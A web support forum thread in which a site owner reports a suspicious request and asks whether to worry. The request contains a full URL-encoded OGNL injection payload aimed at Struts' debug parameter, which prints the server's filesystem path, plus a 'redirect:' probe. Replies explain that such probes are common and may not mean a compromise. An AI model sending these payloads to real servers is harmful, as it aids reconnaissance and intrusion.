Site attacked

  • Hello today I logged in an found this on my site:

    mysite.com/?debug=command&expression=%23res%3d%23context.get(\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'),%23res.setCharacterEncoding(%22UTF-8%22),%23req%3d%23context.get(\'com.opensymphony.xwork2.dispatcher.HttpServletRequest\'),%23res.getWriter().print(%22dir:%22),%23res.getWriter().println(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23res.getWriter().flush(),%23res.getWriter().close()

    and after that another:
    mysite.com/?redirect:

    what i need to find or be afraid of?

Viewing 2 replies - 1 through 2 (of 2 total)

  • Remain calm and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    Well… you might be compromised. Or not, you will see a lot of attack probes on your log.

    Look closely at your site. If it is compromised then yes, that’s a good article to start off with.

    If your are not compromised then it’s just a probe.

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘Site attacked’ is closed to new replies.